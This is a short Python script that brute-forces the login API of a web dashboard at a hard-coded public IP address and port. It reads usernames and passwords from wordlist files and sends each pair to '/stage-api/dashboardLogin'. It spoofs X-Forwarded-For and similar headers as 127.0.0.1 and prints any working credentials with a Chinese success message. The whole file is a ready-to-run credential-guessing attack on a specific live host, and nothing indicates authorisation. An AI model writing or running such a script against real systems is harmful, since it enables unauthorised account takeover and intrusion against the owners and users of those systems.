import requests,json
from requests.packages import urllib3
urllib3.disable_warnings()
url = "http://221.224.11.195:8093"
head = {
    'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
    'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding':'gzip,deflate',
    'Connection':'close',
    'Upgrade-Insecure-Requests':'1',
    'X-Forwarded-For':'127.0.0.1',
    'X-Originating-IP':'127.0.0.1',
    'X-Remote-IP':'127.0.0.1',
    'X-Remote-Addr':'127.0.0.1',
    'Priority':'u=0,i',
}
res = requests.get(url=url,headers=head,timeout=6)
print(res.status_code)
if res.status_code == 200:
    head = {
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0',
        'Accept':'application/json,text/plain,*/*',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip,deflate',
        'Content-Type':'application/json;charset=utf-8',
        'Content-Language':'zh_CN',
        'Content-Length':'40',
        'Origin':'http://221.224.11.195:8093',
        'Connection':'close',
        'Referer':'http://221.224.11.195:8093/login?redirect=/index',
        'X-Forwarded-For':'127.0.0.1',
        'X-Originating-IP':'127.0.0.1',
        'X-Remote-IP':'127.0.0.1',
        'X-Remote-Addr':'127.0.0.1',
        'Priority':'u=0',
    }
    with open('username.txt','r',encoding='utf-8') as fp:
        for u in fp.readlines():
             with open('password.txt','r',encoding='utf-8') as fo:
                 for m in fo.readlines():
                     data={"username":u.strip(),"password":m.strip()}
                     res1=requests.post(url="http://221.224.11.195:8093/stage-api/dashboardLogin",headers=head,json=data,timeout=6)
                     res2=json.loads(res1.text)
                     if res2['code'] == 200:
                         print(f"密码爆破成功用户名为:{u.strip()}密码为:{m.strip()}")
                         break
